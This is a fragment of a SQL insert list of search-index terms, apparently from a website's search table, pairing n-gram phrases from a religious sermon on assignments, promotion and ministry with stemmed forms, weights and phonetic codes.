(296487, 'future it shows', 'futur it shows', 0, 1, 1.5, 'F3632', 1, '*'),
(296488, 'future when', 'futur when', 0, 1, 1.3667, 'F365', 1, '*'),
(296489, 'future when god', 'futur when god', 0, 1, 1.5, 'F36523', 1, '*'),
(296490, 'gets you ready', 'get you ready', 0, 1, 1.4667, 'G3263', 1, '*'),
(296491, 'give hand-outs', 'give hand-outs', 0, 1, 1.4667, 'G1532', 1, '*'),
(296492, 'give hand-outs he', 'give hand-outs he', 0, 1, 1.5667, 'G1532', 1, '*'),
(296493, 'give titles', 'give titles', 0, 1, 1.3667, 'G1342', 1, '*'),
(296494, 'give titles he', 'give titles he', 0, 1, 1.4667, 'G1342', 1, '*'),
(296495, 'give your best', 'give your best', 0, 1, 1.4667, 'G16123', 1, '*'),
(296496, 'give yourself', 'give yourself', 0, 1, 1.4333, 'G16241', 1, '*'),
(296497, 'give yourself to', 'give yourself to', 0, 1, 1.5333, 'G162413', 1, '*'),
(296498, 'given in', 'given in', 0, 1, 1.2667, 'G150', 1, '*'),
(296499, 'given in the', 'given in the', 0, 1, 1.4, 'G153', 1, '*'),
(296500, 'given in zion', 'given in zion', 0, 1, 1.4333, 'G1525', 1, '*'),
(296501, 'given the pointer', 'given the pointer', 0, 1, 1.5667, 'G1531536', 1, '*'),
(296502, 'gives assignment', 'give assignment', 0, 1, 1.5333, 'G1253', 1, '*'),
(296503, 'gives assignment when', 'give assignment when', 0, 1, 1.7, 'G12535', 1, '*'),
(296504, 'gives assignments', 'give assignments', 0, 1, 1.5667, 'G12532', 1, '*'),
(296505, 'gives assignments god', 'give assignments god', 0, 1, 1.7, 'G125323', 1, '*'),
(296506, 'gives him', 'give him', 0, 1, 1.3, 'G125', 1, '*'),
(296507, 'gives him assignment', 'give him assignment', 0, 1, 1.6667, 'G125253', 1, '*'),
(296508, 'gives you assignments', 'give you assignments', 0, 1, 1.7, 'G12532', 1, '*'),
(296509, 'go and ask', 'go and ask', 0, 1, 1.3333, 'G532', 1, '*'),
(296510, 'god comes for', 'god comes for', 0, 1, 1.4333, 'G325216', 1, '*'),
(296511, 'god doesn\'t give', 'god doesn give', 0, 1, 1.5333, 'G325321', 1, '*'),
(296512, 'god if you', 'god if you', 0, 1, 1.3333, 'G310', 3, '*'),
(296513, 'god wants to', 'god wants to', 0, 1, 1.4, 'G35323', 1, '*'),
(296514, 'god will withdraw', 'god will withdraw', 0, 1, 1.5667, 'G3436', 1, '*'),
(296515, 'goliath\'s', 'goliath', 0, 0, 0.6, 'G432', 1, '*'),
(296516, 'goliath\'s battle', 'goliath battle', 0, 1, 1.5333, 'G432134', 1, '*'),
(296517, 'goliath\'s battle is', 'goliath battle is', 0, 1, 1.6333, 'G4321342', 1, '*'),
(296518, 'goliath\'s battle showed', 'goliath battle showed', 0, 1, 1.7667, 'G43213423', 1, '*'),
(296519, 'had been taking', 'had been taking', 0, 1, 1.5, 'H3153252', 1, '*'),
(296520, 'hand-outs', 'hand-out', 0, 0, 0.6, 'H532', 1, '*'),
(296521, 'hand-outs he', 'hand-out he', 0, 1, 1.4, 'H532', 1, '*'),
(296522, 'hand-outs he gives', 'hand-out he gives', 0, 1, 1.6, 'H53212', 1, '*'),
(296523, 'handling assignments', 'handl assignments', 0, 1, 1.6667, 'H53452532', 1, '*'),
(296524, 'handling assignments assignment', 'handl assignments assignment', 0, 1, 2, 'H5345253253', 1, '*'),
(296525, 'have a ministry', 'have a ministry', 0, 1, 1.5, 'H15236', 1, '*'),
(296526, 'have passed', 'have passed', 0, 1, 1.3667, 'H123', 1, '*'),
(296527, 'have passed serious', 'have passed serious', 0, 1, 1.6333, 'H123262', 1, '*'),
(296528, 'he decided', 'he decided', 0, 1, 1.3333, 'H323', 1, '*'),
(296529, 'he decided to', 'he decided to', 0, 1, 1.4333, 'H323', 1, '*'),
(296530, 'he didn\'t', 'he didn', 0, 1, 1.3, 'H353', 1, '*'),
(296531, 'he didn\'t fail', 'he didn fail', 0, 1, 1.4667, 'H35314', 1, '*'),
(296532, 'he gives', 'he gives', 0, 1, 1.2667, 'H212', 3, '*'),
(296533, 'he gives assignment', 'he gives assignment', 0, 1, 1.6333, 'H21253', 1, '*'),
(296534, 'he gives assignments', 'he gives assignments', 0, 1, 1.6667, 'H212532', 1, '*'),
(296535, 'he gives him', 'he gives him', 0, 1, 1.4, 'H2125', 1, '*'),
(296536, 'he gives you', 'he gives you', 0, 1, 1.4, 'H212', 1, '*'),
(296537, 'he is ready', 'he is ready', 0, 1, 1.3667, 'H263', 1, '*'),
(296538, 'he looks', 'he looks', 0, 1, 1.2667, 'H420', 1, '*'),
(296539, 'he looks at', 'he looks at', 0, 1, 1.3667, 'H423', 1, '*'),
(296540, 'he was serious', 'he was serious', 0, 1, 1.4667, 'H262', 1, '*'),
(296541, 'heart 12 03', 'heart 12 03', 0, 1, 1.3667, 'H630', 1, '*'),
(296542, 'here for', 'here for', 0, 1, 1.2667, 'H616', 1, '*'),
(296543, 'here for show', 'here for show', 0, 1, 1.4333, 'H6162', 1, '*'),
(296544, 'him assignment', 'him assignment', 0, 1, 1.4667, 'H5253', 1, '*'),
(296545, 'him assignment faithfulness', 'him assignment faithfulness', 0, 1, 1.9, 'H5253131452', 1, '*'),
(296546, 'his destiny', 'hi destiny', 0, 1, 1.3667, 'H23235', 1, '*'),
(296547, 'his destiny seriously', 'hi destiny seriously', 0, 1, 1.7, 'H232352624', 1, '*'),
(296548, 'his safety', 'hi safety', 0, 1, 1.3333, 'H213', 1, '*'),
(296549, 'his safety david', 'hi safety david', 0, 1, 1.5333, 'H21313', 1, '*'),
(296550, 'how responsible', 'how responsible', 0, 1, 1.5, 'H6215214', 1, '*'),
(296551, 'how responsible they', 'how responsible they', 0, 1, 1.6667, 'H62152143', 1, '*'),
(296552, 'how successful', 'how successful', 0, 1, 1.4667, 'H214', 1, '*'),
(296553, 'how successful men', 'how successful men', 0, 1, 1.6, 'H2145', 1, '*'),
(296554, 'how successful they', 'how successful they', 0, 1, 1.6333, 'H2143', 1, '*'),
(296555, 'i am saying', 'i am saying', 0, 1, 1.3667, 'I5252', 1, '*'),
(296556, 'i fight', 'i fight', 0, 1, 1.2333, 'I123', 1, '*'),
(296557, 'i fight battles', 'i fight battles', 0, 1, 1.5, 'I1231342', 1, '*'),
(296558, 'if assignment', 'if assignment', 0, 1, 1.4333, 'I1253', 1, '*'),
(296559, 'if assignment is', 'if assignment is', 0, 1, 1.5333, 'I12532', 1, '*'),
(296560, 'if you fail', 'if you fail', 0, 1, 1.3667, 'I140', 1, '*'),
(296561, 'if your assignment', 'if your assignment', 0, 1, 1.6, 'I16253', 1, '*'),
(296562, 'in assignment', 'in assignment', 0, 1, 1.4333, 'I5253', 1, '*'),
(296563, 'in assignment your', 'in assignment your', 0, 1, 1.6, 'I52536', 1, '*'),
(296564, 'in business', 'in business', 0, 1, 1.3667, 'I51252', 1, '*'),
(296565, 'in business in', 'in business in', 0, 1, 1.4667, 'I512525', 1, '*'),
(296566, 'in god if', 'in god if', 0, 1, 1.3, 'I5231', 1, '*'),
(296567, 'in handling', 'in handling', 0, 1, 1.3667, 'I53452', 1, '*'),
(296568, 'in handling assignments', 'in handling assignments', 0, 1, 1.7667, 'I53452532', 1, '*'),
(296569, 'in life i', 'in life i', 0, 1, 1.3, 'I541', 1, '*'),
(296570, 'in life nobody', 'in life nobody', 0, 1, 1.4667, 'I541513', 1, '*'),
(296571, 'in rating', 'in rating', 0, 1, 1.3, 'I56352', 1, '*'),
(296572, 'in rating how', 'in rating how', 0, 1, 1.4333, 'I56352', 1, '*'),
(296573, 'in what state', 'in what state', 0, 1, 1.4333, 'I5323', 1, '*'),
(296574, 'in your journey', 'in your journey', 0, 1, 1.5, 'I56265', 1, '*'),
(296575, 'in zion', 'in zion', 0, 1, 1.2333, 'I525', 1, '*'),
(296576, 'in zion serious', 'in zion serious', 0, 1, 1.5, 'I525262', 1, '*'),
(296577, 'in zion you', 'in zion you', 0, 1, 1.3667, 'I525', 1, '*'),
(296578, 'is a promotion', 'is a promotion', 0, 1, 1.4667, 'I216535', 1, '*'),
(296579, 'is assignment', 'is assignment', 0, 1, 1.4333, 'I253', 1, '*'),
(296580, 'is assignment that', 'is assignment that', 0, 1, 1.6, 'I253', 1, '*'),
(296581, 'is being withdrawn', 'is being withdrawn', 0, 1, 1.6, 'I2152365', 1, '*'),
(296582, 'is different', 'is different', 0, 1, 1.4, 'I231653', 1, '*'),
(296583, 'is different from', 'is different from', 0, 1, 1.5667, 'I231653165', 1, '*'),
(296584, 'is doing something', 'is doing something', 0, 1, 1.6, 'I23525352', 1, '*'),
(296585, 'is not taking', 'is not taking', 0, 1, 1.4333, 'I253252', 1, '*'),
(296586, 'is ready for', 'is ready for', 0, 1, 1.4, 'I26316', 1, '*'),
(296587, 'is the assignment', 'is the assignment', 0, 1, 1.5667, 'I23253', 1, '*'),
(296588, 'is to be', 'is to be', 0, 1, 1.2667, 'I231', 1, '*'),
(296589, 'is to clean', 'is to clean', 0, 1, 1.3667, 'I23245', 1, '*'),
(296590, 'is what determines', 'is what determines', 0, 1, 1.6, 'I23652', 1, '*'),
(296591, 'is what develops', 'is what develops', 0, 1, 1.5333, 'I231412', 1, '*'),
(296592, 'is what gets', 'is what gets', 0, 1, 1.4, 'I23232', 1, '*'),
(296593, 'is what prepares', 'is what prepares', 0, 1, 1.5333, 'I2316162', 1, '*'),
(296594, 'isassignment', 'isassign', 0, 0, 0.8, 'I253', 1, '*'),
(296595, 'isassignment if', 'isassign if', 0, 1, 1.5, 'I2531', 1, '*'),
(296596, 'isassignment if assignment', 'isassign if assignment', 0, 1, 1.8667, 'I2531253', 1, '*'),
(296597, 'it go', 'it go', 0, 1, 1.1667, 'I320', 1, '*'),
(296598, 'it go and', 'it go and', 0, 1, 1.3, 'I3253', 1, '*'),
(296599, 'it is assignment', 'it is assignment', 0, 1, 1.5333, 'I3253', 1, '*'),
(296600, 'it is doing', 'it is doing', 0, 1, 1.3667, 'I32352', 1, '*'),
(296601, 'it meet', 'it meet', 0, 1, 1.2333, 'I353', 1, '*'),
(296602, 'it meet you', 'it meet you', 0, 1, 1.3667, 'I353', 1, '*'),
(296603, 'it shows', 'it shows', 0, 1, 1.2667, 'I320', 1, '*'),
(296604, 'it shows you', 'it shows you', 0, 1, 1.4, 'I320', 1, '*'),
(296605, 'it well it', 'it well it', 0, 1, 1.3333, 'I343', 1, '*'),
(296606, 'it will make', 'it will make', 0, 1, 1.4, 'I3452', 1, '*'),
(296607, 'item 30', 'item 30', 0, 1, 1.2333, 'I350', 1, '*'),
(296608, 'item 30 from', 'item 30 from', 0, 1, 1.4, 'I35165', 1, '*'),
(296609, 'joseph took', 'joseph took', 0, 1, 1.3667, 'J132', 1, '*'),
(296610, 'joseph took assignment', 'joseph took assignment', 0, 1, 1.7333, 'J13253', 1, '*'),
(296611, 'journey as', 'journei as', 0, 1, 1.3333, 'J652', 1, '*'),
(296612, 'journey as a', 'journei as a', 0, 1, 1.4, 'J652', 1, '*'),
(296613, 'just be here', 'just be here', 0, 1, 1.4, 'J316', 1, '*'),
(296614, 'k2 item 30', 'k2 item 30', 0, 1, 1.3333, 'K350', 1, '*'),
(296615, 'kinds of battles', 'kind of battles', 0, 1, 1.5333, 'K5321342', 1, '*'),
(296616, 'kingdom is', 'kingdom is', 0, 1, 1.3333, 'K52352', 1, '*'),
(296617, 'kingdom is what', 'kingdom is what', 0, 1, 1.5, 'K523523', 1, '*'),
(296618, 'kingdom take', 'kingdom take', 0, 1, 1.4, 'K523532', 2, '*'),
(296619, 'kingdom take your', 'kingdom take your', 0, 1, 1.5667, 'K5235326', 1, '*'),
(296620, 'know you', 'know you', 0, 1, 1.2667, 'K500', 1, '*'),
(296621, 'know you are', 'know you are', 0, 1, 1.4, 'K560', 1, '*'),
(296622, 'last and', 'last and', 0, 1, 1.2667, 'L2353', 1, '*'),
(296623, 'last and eventually', 'last and eventually', 0, 1, 1.6333, 'L23531534', 1, '*'),
(296624, 'level he', 'level he', 0, 1, 1.2667, 'L140', 1, '*'),
(296625, 'level he gives', 'level he gives', 0, 1, 1.4667, 'L14212', 1, '*'),
(296626, 'life i fight', 'life i fight', 0, 1, 1.4, 'L123', 1, '*'),
(296627, 'life i want', 'life i want', 0, 1, 1.3667, 'L153', 1, '*'),
(296628, 'life nobody', 'life nobody', 0, 1, 1.3667, 'L1513', 1, '*'),
(296629, 'life nobody promotes', 'life nobody promotes', 0, 1, 1.6667, 'L151316532', 1, '*'),
(296630, 'looking for relevance', 'look for relevance', 0, 1, 1.7, 'L252164152', 1, '*'),
(296631, 'looks at', 'look at', 0, 1, 1.2667, 'L230', 1, '*'),
(296632, 'looks at how', 'look at how', 0, 1, 1.4, 'L230', 1, '*'),
(296633, 'man can have', 'man can have', 0, 1, 1.4, 'M251', 1, '*'),
(296634, 'man he gives', 'man he gives', 0, 1, 1.4, 'M212', 1, '*'),
(296635, 'manifestations of', 'manifest of', 0, 1, 1.5667, 'M123521', 1, '*'),
(296636, 'manifestations of victory', 'manifest of victory', 0, 1, 1.8333, 'M123521236', 1, '*'),
(296637, 'matter the title', 'matter the title', 0, 1, 1.5333, 'M3634', 1, '*'),
(296638, 'me to tell', 'me to tell', 0, 1, 1.3333, 'M340', 1, '*'),
(296639, 'mediocrity', 'mediocr', 0, 0, 0.6667, 'M3263', 1, '*'),
(296640, 'mediocrity there', 'mediocr there', 0, 1, 1.5333, 'M32636', 1, '*'),
(296641, 'mediocrity there are', 'mediocr there are', 0, 1, 1.6667, 'M32636', 1, '*'),
(296642, 'meet you god', 'meet you god', 0, 1, 1.4, 'M323', 1, '*'),
(296643, 'men are in', 'men are in', 0, 1, 1.3333, 'M650', 1, '*'),
(296644, 'men don\'t', 'men don', 0, 1, 1.3, 'M353', 1, '*'),
(296645, 'men don\'t last', 'men don last', 0, 1, 1.4667, 'M353423', 1, '*'),
(296646, 'ministry and you', 'ministri and you', 0, 1, 1.5333, 'M23653', 1, '*'),
(296647, 'ministry assignment', 'ministri assignment', 0, 1, 1.6333, 'M236253', 1, '*'),
(296648, 'ministry assignment is', 'ministri assignment is', 0, 1, 1.7333, 'M2362532', 1, '*'),
(296649, 'ministry but', 'ministri but', 0, 1, 1.4, 'M23613', 2, '*'),
(296650, 'ministry but because', 'ministri but because', 0, 1, 1.6667, 'M2361312', 1, '*'),
(296651, 'ministry but without', 'ministri but without', 0, 1, 1.6667, 'M23613', 1, '*'),
(296652, 'ministry will', 'ministri will', 0, 1, 1.4333, 'M2364', 1, '*'),
(296653, 'ministry will be', 'ministri will be', 0, 1, 1.5333, 'M23641', 1, '*'),
(296654, 'must apply', 'must apply', 0, 1, 1.3333, 'M2314', 1, '*'),
(296655, 'must apply diligence', 'must apply diligence', 0, 1, 1.6667, 'M231434252', 1, '*'),
(296656, 'must never', 'must never', 0, 1, 1.3333, 'M23516', 1, '*'),
(296657, 'must never confuse', 'must never confuse', 0, 1, 1.6, 'M235162512', 1, '*'),
(296658, 'must take assignment', 'must take assignment', 0, 1, 1.6667, 'M23253', 1, '*'),
(296659, 'never confuse', 'never confuse', 0, 1, 1.4333, 'N162512', 1, '*'),
(296660, 'never confuse the', 'never confuse the', 0, 1, 1.5667, 'N1625123', 1, '*'),
(296661, 'nobody promotes', 'nobodi promotes', 0, 1, 1.5, 'N1316532', 1, '*'),
(296662, 'nobody promotes a', 'nobodi promotes a', 0, 1, 1.5667, 'N1316532', 1, '*'),
(296663, 'not doing too', 'not doing too', 0, 1, 1.4333, 'N3523', 1, '*'),
(296664, 'not for the', 'not for the', 0, 1, 1.3667, 'N3163', 1, '*'),
(296665, 'not look', 'not look', 0, 1, 1.2667, 'N342', 1, '*'),
(296666, 'not look at', 'not look at', 0, 1, 1.3667, 'N3423', 1, '*'),
(296667, 'not ready', 'not ready', 0, 1, 1.3, 'N363', 1, '*'),
(296668, 'not ready for', 'not ready for', 0, 1, 1.4333, 'N36316', 1, '*'),
(296669, 'not stop praying', 'not stop praying', 0, 1, 1.5333, 'N3231652', 1, '*'),
(296670, 'not taking', 'not taking', 0, 1, 1.3333, 'N3252', 1, '*'),
(296671, 'not taking assignments', 'not taking assignments', 0, 1, 1.7333, 'N3252532', 1, '*'),
(296672, 'not title', 'not title', 0, 1, 1.3, 'N340', 1, '*'),
(296673, 'not title if', 'not title if', 0, 1, 1.4, 'N341', 1, '*'),
(296674, 'not you are', 'not you are', 0, 1, 1.3667, 'N360', 1, '*'),
(296675, 'of battles', 'of battles', 0, 1, 1.3333, 'O1342', 1, '*'),
(296676, 'of battles in', 'of battles in', 0, 1, 1.4333, 'O13425', 1, '*'),
(296677, 'of mediocrity', 'of mediocrity', 0, 1, 1.4333, 'O153263', 1, '*'),
(296678, 'of mediocrity there', 'of mediocrity there', 0, 1, 1.6333, 'O1532636', 1, '*'),
(296679, 'of ministry but', 'of ministry but', 0, 1, 1.5, 'O1523613', 1, '*'),
(296680, 'of victory you', 'of victory you', 0, 1, 1.4667, 'O1236', 1, '*'),
(296681, 'of you women', 'of you women', 0, 1, 1.4, 'O150', 1, '*'),
(296682, 'on some', 'on some', 0, 1, 1.2333, 'O525', 1, '*'),
(296683, 'on some critical', 'on some critical', 0, 1, 1.5333, 'O52526324', 1, '*'),
(296684, 'or destroy', 'or destroy', 0, 1, 1.3333, 'O63236', 1, '*'),
(296685, 'or destroy your', 'or destroy your', 0, 1, 1.5, 'O63236', 1, '*'),
(296686, 'or not you', 'or not you', 0, 1, 1.3333, 'O653', 1, '*'),
(296687, 'passed serious', 'pass serious', 0, 1, 1.4667, 'P23262', 1, '*'),
(296688, 'passed serious assignments', 'pass serious assignments', 0, 1, 1.8667, 'P23262532', 1, '*'),
(296689, 'personal battles', 'person battles', 0, 1, 1.5333, 'P62541342', 1, '*'),
(296690, 'personal battles there', 'person battles there', 0, 1, 1.7333, 'P6254134236', 1, '*'),
(296691, 'pointer to', 'pointer to', 0, 1, 1.3333, 'P5363', 1, '*'),
(296692, 'pointer to know', 'pointer to know', 0, 1, 1.5, 'P536325', 1, '*'),
(296693, 'posting', 'post', 0, 0, 0.4667, 'P2352', 1, '*'),
(296694, 'posting until', 'post until', 0, 1, 1.4333, 'P2352534', 1, '*'),
(296695, 'posting until you', 'post until you', 0, 1, 1.5667, 'P2352534', 1, '*'),
(296696, 'potential in', 'potenti in', 0, 1, 1.4, 'P35345', 1, '*'),
(296697, 'potential in life', 'potenti in life', 0, 1, 1.5667, 'P3534541', 1, '*'),
(296698, 'praying while', 'prai while', 0, 1, 1.4333, 'P6524', 1, '*'),
(296699, 'praying while you', 'prai while you', 0, 1, 1.5667, 'P6524', 1, '*'),
(296700, 'pregnant what', 'pregnant what', 0, 1, 1.4333, 'P6253', 1, '*'),
(296701, 'pregnant what you', 'pregnant what you', 0, 1, 1.5667, 'P6253', 1, '*'),
(296702, 'prepares', 'prepar', 0, 0, 0.5333, 'P6162', 1, '*'),
(296703, 'prepares us', 'prepar us', 0, 1, 1.3667, 'P6162', 1, '*'),
(296704, 'prepares us till', 'prepar us till', 0, 1, 1.5333, 'P616234', 1, '*'),
(296705, 'prepares you', 'prepar you', 0, 1, 1.4, 'P6162', 1, '*'),
(296706, 'prepares you for', 'prepar you for', 0, 1, 1.5333, 'P616216', 1, '*'),
(296707, 'promote', 'promot', 0, 0, 0.4667, 'P653', 2, '*'),
(296708, 'promote a', 'promot a', 0, 1, 1.3, 'P653', 1, '*'),
(296709, 'promote a man', 'promot a man', 0, 1, 1.4333, 'P6535', 1, '*'),
(296710, 'promote a steward', 'promot a steward', 0, 1, 1.5667, 'P6532363', 1, '*'),
(296711, 'promotes', 'promot', 0, 0, 0.5333, 'P6532', 1, '*'),
(296712, 'promotes a', 'promot a', 0, 1, 1.3333, 'P6532', 1, '*'),
(296713, 'promotes a student', 'promot a student', 0, 1, 1.6, 'P6532353', 1, '*'),
(296714, 'promotion battle', 'promot battle', 0, 1, 1.5333, 'P6535134', 1, '*'),
(296715, 'promotion battle he', 'promot battle he', 0, 1, 1.6333, 'P6535134', 1, '*'),
(296716, 'promotion battle shows', 'promot battle shows', 0, 1, 1.7333, 'P65351342', 1, '*'),
(296717, 'promotion or not', 'promot or not', 0, 1, 1.5333, 'P6535653', 1, '*'),
(296718, 'rather he', 'rather he', 0, 1, 1.3, 'R360', 1, '*'),
(296719, 'rather he looks', 'rather he looks', 0, 1, 1.5, 'R3642', 1, '*'),
(296720, 'rating how', 'rate how', 0, 1, 1.3333, 'R352', 1, '*'),
(296721, 'rating how successful', 'rate how successful', 0, 1, 1.7, 'R35214', 1, '*'),
(296722, 'ready for ministry', 'readi for ministry', 0, 1, 1.6, 'R3165236', 1, '*'),
(296723, 'ready for posting', 'readi for posting', 0, 1, 1.5667, 'R31612352', 1, '*'),
(296724, 'ready for promotion', 'readi for promotion', 0, 1, 1.6333, 'R31616535', 1, '*'),
(296725, 'real give', 'real give', 0, 1, 1.3, 'R421', 1, '*'),
(296726, 'real give your', 'real give your', 0, 1, 1.4667, 'R4216', 1, '*'),
(296727, 'relevance', 'relev', 0, 0, 0.6, 'R4152', 2, '*'),
(296728, 'relevance in', 'relev in', 0, 1, 1.4, 'R41525', 1, '*'),
(296729, 'relevance in the', 'relev in the', 0, 1, 1.5333, 'R415253', 1, '*'),
(296730, 'responsible they', 'respons they', 0, 1, 1.5333, 'R2152143', 1, '*'),
(296731, 'responsible they are', 'respons they are', 0, 1, 1.6667, 'R21521436', 1, '*'),
(296732, 'safety david', 'safeti david', 0, 1, 1.4, 'S1313', 1, '*'),
(296733, 'safety david had', 'safeti david had', 0, 1, 1.5333, 'S1313', 1, '*'),
(296734, 'sake of', 'sake of', 0, 1, 1.2333, 'S100', 1, '*'),
(296735, 'sake of ministry', 'sake of ministry', 0, 1, 1.5333, 'S15236', 1, '*'),
(296736, 'samson when', 'samson when', 0, 1, 1.3667, 'S525', 1, '*'),
(296737, 'samson when he', 'samson when he', 0, 1, 1.4667, 'S525', 1, '*'),
(296738, 'saying this because', 'sai this because', 0, 1, 1.6333, 'S523212', 1, '*'),
(296739, 'serious and that', 'seriou and that', 0, 1, 1.5333, 'S6253', 1, '*'),
(296740, 'serious assignment', 'seriou assignment', 0, 1, 1.6, 'S6253', 1, '*'),
(296741, 'serious assignment is', 'seriou assignment is', 0, 1, 1.7, 'S62532', 1, '*'),
(296742, 'serious assignments', 'seriou assignments', 0, 1, 1.6333, 'S62532', 1, '*'),
(296743, 'serious assignments it', 'seriou assignments it', 0, 1, 1.7333, 'S625323', 1, '*'),
(296744, 'serious before', 'seriou before', 0, 1, 1.4667, 'S6216', 1, '*'),
(296745, 'serious before goliath\'s', 'seriou before goliath', 0, 1, 1.8, 'S62162432', 1, '*'),
(296746, 'serious not', 'seriou not', 0, 1, 1.3667, 'S6253', 1, '*'),
(296747, 'serious not for', 'seriou not for', 0, 1, 1.5, 'S625316', 1, '*'),
(296748, 'serious something', 'seriou something', 0, 1, 1.5667, 'S625352', 1, '*'),
(296749, 'serious something is', 'seriou something is', 0, 1, 1.6667, 'S625352', 1, '*'),
(296750, 'serious that', 'seriou that', 0, 1, 1.4, 'S623', 1, '*'),
(296751, 'serious that will', 'seriou that will', 0, 1, 1.5667, 'S6234', 1, '*'),
(296752, 'serious why', 'seriou why', 0, 1, 1.3667, 'S620', 1, '*'),
(296753, 'serious why should', 'seriou why should', 0, 1, 1.6, 'S6243', 1, '*'),
(296754, 'serious with', 'seriou with', 0, 1, 1.4, 'S623', 1, '*'),
(296755, 'serious with assignment', 'seriou with assignment', 0, 1, 1.7667, 'S623253', 1, '*'),
(296756, 'seriously', 'serious', 0, 0, 0.6, 'S624', 1, '*'),
(296757, 'seriously joseph', 'serious joseph', 0, 1, 1.5333, 'S62421', 1, '*'),
(296758, 'seriously joseph took', 'serious joseph took', 0, 1, 1.7, 'S6242132', 1, '*'),
(296759, 'seriousness', 'serious', 0, 0, 0.7333, 'S6252', 2, '*'),
(296760, 'seriousness to', 'serious to', 0, 1, 1.4667, 'S62523', 1, '*'),
(296761, 'seriousness to it', 'serious to it', 0, 1, 1.5667, 'S62523', 1, '*'),
(296762, 'should not stop', 'should not stop', 0, 1, 1.5, 'S4353231', 1, '*'),
(296763, 'should you promote', 'should you promote', 0, 1, 1.6, 'S431653', 1, '*'),
(296764, 'show but', 'show but', 0, 1, 1.2667, 'S130', 1, '*'),
(296765, 'show but for', 'show but for', 0, 1, 1.4, 'S1316', 1, '*'),
(296766, 'showed up', 'show up', 0, 1, 1.3, 'S310', 1, '*'),
(296767, 'showed up and', 'show up and', 0, 1, 1.4333, 'S3153', 1, '*'),
(296768, 'showed up goliath\'s', 'show up goliath', 0, 1, 1.6333, 'S312432', 1, '*'),
(296769, 'shows up in', 'show up in', 0, 1, 1.3667, 'S150', 2, '*'),
(296770, 'shows you', 'show you', 0, 1, 1.3, 'S000', 1, '*'),
(296771, 'shows you are', 'show you are', 0, 1, 1.4333, 'S600', 1, '*'),
(296772, 'shows you your', 'show you your', 0, 1, 1.4667, 'S600', 1, '*'),
(296773, 'some critical', 'some critical', 0, 1, 1.4333, 'S526324', 1, '*'),
(296774, 'some critical truths', 'some critical truths', 0, 1, 1.6667, 'S5263243632', 1, '*'),
(296775, 'something is', 'someth is', 0, 1, 1.4, 'S5352', 1, '*'),
(296776, 'something is to', 'someth is to', 0, 1, 1.5, 'S53523', 1, '*'),
(296777, 'something to', 'someth to', 0, 1, 1.4, 'S53523', 1, '*'),
(296778, 'something to your', 'someth to your', 0, 1, 1.5667, 'S535236', 1, '*'),
(296779, 'spirit as you', 'spirit as you', 0, 1, 1.4333, 'S1632', 1, '*'),
(296780, 'spirit what', 'spirit what', 0, 1, 1.3667, 'S163', 1, '*'),
(296781, 'spirit what is', 'spirit what is', 0, 1, 1.4667, 'S1632', 1, '*'),
(296782, 'spiritually isassignment', 'spiritu isassignment', 0, 1, 1.8, 'S1634253', 1, '*'),
(296783, 'spiritually isassignment if', 'spiritu isassignment if', 0, 1, 1.9, 'S16342531', 1, '*'),
(296784, 'state will', 'state will', 0, 1, 1.3333, 'S340', 1, '*'),
(296785, 'state will it', 'state will it', 0, 1, 1.4333, 'S343', 1, '*'),
(296786, 'steward', 'steward', 0, 0, 0.4667, 'S363', 1, '*'),
(296787, 'steward who', 'steward who', 0, 1, 1.3667, 'S363', 1, '*'),
(296788, 'steward who is', 'steward who is', 0, 1, 1.4667, 'S3632', 1, '*'),
(296789, 'stop looking', 'stop looking', 0, 1, 1.4, 'S314252', 1, '*'),
(296790, 'stop looking for', 'stop looking for', 0, 1, 1.5333, 'S31425216', 1, '*'),
(296791, 'stop praying', 'stop praying', 0, 1, 1.4, 'S31652', 1, '*'),
(296792, 'stop praying while', 'stop praying while', 0, 1, 1.6, 'S316524', 1, '*'),
(296793, 'student that', 'student that', 0, 1, 1.4, 'S353', 1, '*'),
(296794, 'student that is', 'student that is', 0, 1, 1.5, 'S3532', 1, '*'),
(296795, 'successful men', 'success men', 0, 1, 1.4667, 'S145', 1, '*'),
(296796, 'successful men are', 'success men are', 0, 1, 1.6, 'S1456', 1, '*'),
(296797, 'successful they', 'success they', 0, 1, 1.5, 'S143', 1, '*'),
(296798, 'successful they are', 'success they are', 0, 1, 1.6333, 'S1436', 1, '*'),
(296799, 'such men', 'such men', 0, 1, 1.2667, 'S500', 1, '*'),
(296800, 'such men don\'t', 'such men don', 0, 1, 1.4667, 'S5353', 1, '*'),
(296801, 'sustains', 'sustain', 0, 0, 0.5333, 'S352', 1, '*'),
(296802, 'sustains you', 'sustain you', 0, 1, 1.4, 'S352', 1, '*'),
(296803, 'sustains you not', 'sustain you not', 0, 1, 1.5333, 'S35253', 1, '*'),
(296804, 'take assignment', 'take assignment', 0, 1, 1.5, 'T253', 1, '*'),
(296805, 'take assignment in', 'take assignment in', 0, 1, 1.6, 'T2535', 1, '*'),
(296806, 'take your assignment', 'take your assignment', 0, 1, 1.6667, 'T26253', 1, '*'),
(296807, 'taking assignment', 'take assignment', 0, 1, 1.5667, 'T25253', 1, '*'),
(296808, 'taking assignment serious', 'take assignment serious', 0, 1, 1.8333, 'T25253262', 1, '*'),
(296809, 'taking assignments', 'take assignments', 0, 1, 1.6, 'T252532', 1, '*'),
(296810, 'taking assignments serious', 'take assignments serious', 0, 1, 1.8667, 'T25253262', 1, '*'),
(296811, 'tell you to', 'tell you to', 0, 1, 1.3667, 'T430', 2, '*'),
(296812, 'that sustains', 'that sustains', 0, 1, 1.4333, 'T2352', 1, '*'),
(296813, 'that sustains you', 'that sustains you', 0, 1, 1.5667, 'T2352', 1, '*'),
(296814, 'that your deliveries', 'that your deliveries', 0, 1, 1.6667, 'T634162', 1, '*'),
(296815, 'the assignment you', 'the assignment you', 0, 1, 1.6, 'T253', 1, '*'),
(296816, 'the church do', 'the church do', 0, 1, 1.4333, 'T2623', 1, '*'),
(296817, 'the difference in', 'the difference in', 0, 1, 1.5667, 'T16525', 1, '*'),
(296818, 'the i', 'the i', 0, 1, 1.1667, 'T000', 1, '*'),
(296819, 'the i fight', 'the i fight', 0, 1, 1.3667, 'T123', 1, '*'),
(296820, 'the kingdom is', 'the kingdom is', 0, 1, 1.4667, 'T252352', 1, '*'),
(296821, 'the kingdom take', 'the kingdom take', 0, 1, 1.5333, 'T2523532', 1, '*'),
(296822, 'the pointer', 'the pointer', 0, 1, 1.3667, 'T1536', 1, '*'),
(296823, 'the pointer to', 'the pointer to', 0, 1, 1.4667, 'T15363', 1, '*'),
(296824, 'the sake', 'the sake', 0, 1, 1.2667, 'T200', 1, '*'),
(296825, 'the sake of', 'the sake of', 0, 1, 1.3667, 'T210', 1, '*'),
(296826, 'the title you', 'the title you', 0, 1, 1.4333, 'T400', 1, '*'),
